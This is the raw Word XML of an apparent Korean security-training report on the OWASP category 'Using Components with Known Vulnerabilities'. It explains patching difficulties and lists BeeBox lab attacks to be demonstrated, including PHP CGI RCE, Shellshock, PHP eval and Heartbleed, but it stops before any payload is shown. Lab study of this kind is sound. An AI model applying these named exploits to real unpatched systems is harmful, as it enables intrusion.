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7D7D8">
    <v:background id="_x0000_s1025" o:bwmode="white" fillcolor="#b7d7d8">
      <v:fill r:id="rId4" o:title="점선 눈금" color2="#edf7f5" type="pattern"/>
    </v:background>
  </w:background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"/>
        <w:gridCol w:w="871"/>
        <w:gridCol w:w="1723"/>
        <w:gridCol w:w="1742"/>
        <w:gridCol w:w="1742"/>
        <w:gridCol w:w="1763"/>
        <w:gridCol w:w="881"/>
        <w:gridCol w:w="31"/>
        <w:gridCol w:w="851"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE047E" w14:paraId="6324ACA9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ACFB2" w14:textId="57E71F94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  <w:bookmarkStart w:id="0" w:name="_Hlk61364052"/>
            <w:bookmarkStart w:id="1" w:name="_Hlk60052717"/>
            <w:bookmarkEnd w:id="0"/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EBBE6" w14:textId="77777777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B5766" w14:textId="44E9A2A9" w:rsidR="00DE047E" w:rsidRPr="00810D7F" w:rsidRDefault="00DE047E" w:rsidP="00DE047E">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pP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K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 xml:space="preserve">ITRI </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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모의해킹</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 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>28</w:t>
            </w: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기</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00810D7F" w:rsidRPr="00DE047E" w14:paraId="4DE911D3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424C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3CAEB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C976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0396986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EDD8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AF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94457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AE5FB7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C161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8710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42ED8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2C9DFD5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B72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B97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6992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4A49F28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3199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A40D4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5BF9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939AD8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A88C7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DEDC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17703E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5FF65D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507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4799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588551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0C58FACA" w14:textId="77777777" w:rsidTr="00435F8A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0A99D" w14:textId="144B683C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3ED0819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65CAE" w14:textId="14F1194B" w:rsidR="00435F8A" w:rsidRPr="00DE047E" w:rsidRDefault="00C5676E" w:rsidP="00435F8A">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>작성</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00A964D4">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A964D4">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>보안팀</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000464AF">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00435F8A" w:rsidRPr="00435F8A">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">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ECA70" w14:textId="147FE44F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2485F3F2" w14:textId="77777777" w:rsidTr="00435F8A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1CD62D3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8753" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="thickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="thinThickSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32D8D39D" w14:textId="716E20E2" w:rsidR="00435F8A" w:rsidRPr="001F0BA1" w:rsidRDefault="00A964D4" w:rsidP="00435F8A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
              </w:rPr>
              <w:t>sing Components with known vulnerabiliti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80FE2" w14:textId="781E05FE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190BD00C" w14:textId="77777777" w:rsidTr="00435F8A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A4FC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5F3D3" w14:textId="6959D1B3" w:rsidR="00810D7F" w:rsidRPr="00A964D4" w:rsidRDefault="00A964D4" w:rsidP="00A964D4">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:ind w:leftChars="0"/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  <w:r w:rsidRPr="00A964D4">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="00A964D4">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">WASP TOP 9/10 (2020) </w:t>
            </w:r>
            <w:r w:rsidR="000464AF" w:rsidRPr="00A964D4">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>-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FDDC7" w14:textId="4388ADB6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68E102FE" w14:textId="77777777" w:rsidTr="00BE7966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E9C09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C4D200" w14:textId="77777777" w:rsidR="00810D7F" w:rsidRPr="00810D7F" w:rsidRDefault="00810D7F" w:rsidP="00810D7F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8FD7A" w14:textId="77777777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DE047E" w:rsidRPr="00DE047E" w14:paraId="76FD6D8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90B09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95EB1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2810B" w14:textId="6479F329" w:rsidR="00DE047E" w:rsidRPr="00810D7F" w:rsidRDefault="00DE047E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1C780E1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DAD1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61157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84031C" w14:textId="6C177B51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7103841A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4613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0C0E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B09F37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62B969F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28644DC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9E1A7E3" w14:textId="7E233990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27873" w14:textId="5BE2B0C2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</w:tbl>
    <w:p w14:paraId="4C621116" w14:textId="69366842" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="674AA210" w14:textId="353823D8" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="45C3DBC0" w14:textId="05D23D21" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="6D7FCF70" w14:textId="04D9152B" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="688F1889" w14:textId="35F0D32F" w:rsidR="00DE047E" w:rsidRDefault="00DE047E"/>
    <w:p w14:paraId="72E2834B" w14:textId="77777777" w:rsidR="00C165CA" w:rsidRDefault="00C165CA"/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1F0BA1" w:rsidRPr="00E81668" w14:paraId="1ECED905" w14:textId="77777777" w:rsidTr="00BE7966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914D227" w14:textId="3322A320" w:rsidR="001F0BA1" w:rsidRPr="006F2E6D" w:rsidRDefault="001F0BA1" w:rsidP="00A964D4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t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="006F2E6D">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A964D4">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="38"/>
                <w:szCs w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A964D4" w:rsidRPr="00A964D4">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="38"/>
                <w:szCs w:val="38"/>
              </w:rPr>
              <w:t>Using Components with known Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w14:paraId="1F0494B8" w14:textId="77777777" w:rsidTr="0058148E">
        <w:trPr>
          <w:trHeight w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="288C0766" w14:textId="09B8E161" w:rsidR="001F0BA1" w:rsidRPr="00E81668" w:rsidRDefault="00E81668" w:rsidP="001F0BA1">
            <w:pPr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/>
                <w:noProof/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31177B0E" wp14:editId="5C0B1B04">
                  <wp:extent cx="6638290" cy="3871356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789" cy="3875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D37" w14:paraId="3F4646FD" w14:textId="77777777" w:rsidTr="0058148E">
        <w:trPr>
          <w:trHeight w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B9A0889" w14:textId="77777777" w:rsidR="008D5D37" w:rsidRDefault="008D5D37" w:rsidP="001F0BA1">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF4100" w14:paraId="16CF0060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73491EC" w14:textId="5E382B54" w:rsidR="00DF4100" w:rsidRPr="00DF4100" w:rsidRDefault="00DF4100" w:rsidP="00DF4100">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29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DF4100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취약점 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00DF4100">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Using Components with known Vulnerabilities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’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이란 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF4100" w14:paraId="5E0A041F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13D40E54" w14:textId="77777777" w:rsidR="00DF4100" w:rsidRPr="00DF4100" w:rsidRDefault="00DF4100" w:rsidP="00DF4100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2023ADED" w14:textId="696B099B" w:rsidR="00DF4100" w:rsidRDefault="00FD6827" w:rsidP="00DF4100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이미 식별됐던 취약점이 존재하는 버전을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업데이트없이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계속 사용하면서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발생하는 취약점이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개인의 경우에는 프로그램의 업데이트 권고에 따라 단순 클릭 몇 번으로 자체적인 업데이트를 하여 사전에 방지할 수 있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그러나 기업 또는 단체 같은 경우엔 현재 운영중인 대형 서버를 실시간으로 업데이트 하기 위해서는 많은 준비와 비용이 필요하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또한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os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>같은경우에도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라이선스문제로 막대한 비용이 청구될 수 있기 때문에 보안담당자들에게는 알면서도 대비하기 힘든 </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>취약점이라고 볼 수 있다.</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4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</w:p>
          <w:p w14:paraId="4A5C68BB" w14:textId="011F560F" w:rsidR="009A75C4" w:rsidRDefault="009A75C4" w:rsidP="00DF4100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이런 부분을 고려했을 때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해당 취약점은 정해진 공격이 있는 것이 아니라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현존하는 모든 공격 중에 보안 패치가 되어있지 않은 취약점들은 모두 이것에 해당된다고 볼 수 있다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="243345D0" w14:textId="668E0613" w:rsidR="00DF4100" w:rsidRPr="008D5D37" w:rsidRDefault="00DF4100" w:rsidP="00DF4100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DF4100" w14:paraId="7279AE91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4078B9B8" w14:textId="0E12711F" w:rsidR="00DF4100" w:rsidRPr="00DF4100" w:rsidRDefault="00DF4100" w:rsidP="00DF4100">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29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가능 공격</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF4100" w14:paraId="4766BEA3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736BB764" w14:textId="454DF107" w:rsidR="00DF4100" w:rsidRDefault="009A75C4" w:rsidP="00DF4100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</w:p>
          <w:p w14:paraId="4566CE7A" w14:textId="50FABFC1" w:rsidR="00D802CA" w:rsidRDefault="00D802CA" w:rsidP="009A75C4">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="19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위에서 설명한대로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해당 취약점은 </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">종류 구분없이 현재 버전의 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>보안패치에</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 해당되지 않은 모든 취약점(I</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">njection, XSS, Access </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Contorl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009A75C4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="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>우회 등)</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4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="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>들을 포함한다.</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4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="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">현재 구축중인 당사의 토폴로지와 서버에는 어떤 수준까지 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>보안패치가</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 되었는지 </w:t>
            </w:r>
            <w:r w:rsidR="00285909">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">아직 </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>확인이 불가능하므로,</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4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="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>BeeBox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>에서 제공하는 서버환경을 이용하여 진행하겠다.</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4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="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>BeeBox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">에서는 다음과 같은 </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>가지 공격을 제공하나,</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4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="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">타 공격에서 다뤘던 </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Buffer Overflow, Injection </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>등은 제외하고 진행하겠다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029B999D" w14:textId="77777777" w:rsidR="00DF4100" w:rsidRPr="008E0BE0" w:rsidRDefault="00DF4100" w:rsidP="00DF4100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741A30B7" w14:textId="77777777" w:rsidR="00DF4100" w:rsidRPr="008E0BE0" w:rsidRDefault="00DF4100" w:rsidP="00DF4100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45943712" w14:textId="7CE2B83A" w:rsidR="00D802CA" w:rsidRPr="00C165CA" w:rsidRDefault="00D802CA" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>HP CGI Remote Code Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05A49B99" w14:textId="1FD815DE" w:rsidR="00C165CA" w:rsidRPr="00C165CA" w:rsidRDefault="00C165CA" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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S</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>hellshock Vulnerability (CHI)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="351159FF" w14:textId="3979936B" w:rsidR="00D802CA" w:rsidRPr="00C165CA" w:rsidRDefault="00D802CA" w:rsidP="00C165CA">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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P</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>HP Eval Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="240F637F" w14:textId="77777777" w:rsidR="00D802CA" w:rsidRDefault="00C165CA" w:rsidP="009E202F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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H</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>eartBleed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Vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2792D79F" w14:textId="41097D0E" w:rsidR="009E202F" w:rsidRPr="009E202F" w:rsidRDefault="009E202F" w:rsidP="009E202F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:leftChars="0"/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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="492E5CB9" w14:textId="77777777" w:rsidTr="006F2E6D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28EDE31B" w14:textId="32E234D9" w:rsidR="003D753D" w:rsidRPr="00BE7966" w:rsidRDefault="005351E1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7FDD369E" wp14:editId="2CD032B7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58" name="직사각형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A258C" id="직사각형 58" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt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qjtA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BE7966" w14:paraId="24950B0C" w14:textId="77777777" w:rsidTr="009A75C4">
        <w:trPr>
          <w:trHeight w:val="445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1C2431A" w14:textId="1B19F126" w:rsidR="00BE7966" w:rsidRPr="0050741D" w:rsidRDefault="007E7463" w:rsidP="00966D52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 wp14:anchorId="78A8E46F" wp14:editId="4A366C6C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="margin">
                        <wp:posOffset>-37465</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="margin">
                        <wp:posOffset>-95885</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="9843135"/>
                      <wp:effectExtent l="0" t="0" r="9525" b="5715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843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10ED77" w14:textId="12E051D1" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="0031797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8E46F" id="직사각형 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:-2.95pt;margin-top:-7.55pt;width:533.25pt;height:775.05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" fillcolor="white [3212]" stroked="f" strokeweight="1pt">
                      <v:fill opacity="27499f"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="5610ED77" w14:textId="12E051D1" w:rsidR="009706E0" w:rsidRDefault="009706E0" w:rsidP="003179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s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 w:rsidR="006F2E6D">
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidR="0050741D" w:rsidRPr="0050741D">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0050741D"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 w:rsidR="006F2E6D">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>공격</w:t>
            </w:r>
            <w:r w:rsidR="00841480">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00841480">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00841480">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="009A75C4"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 </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="009A75C4">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="009A75C4" w:rsidRPr="009A75C4">
              <w:rPr>
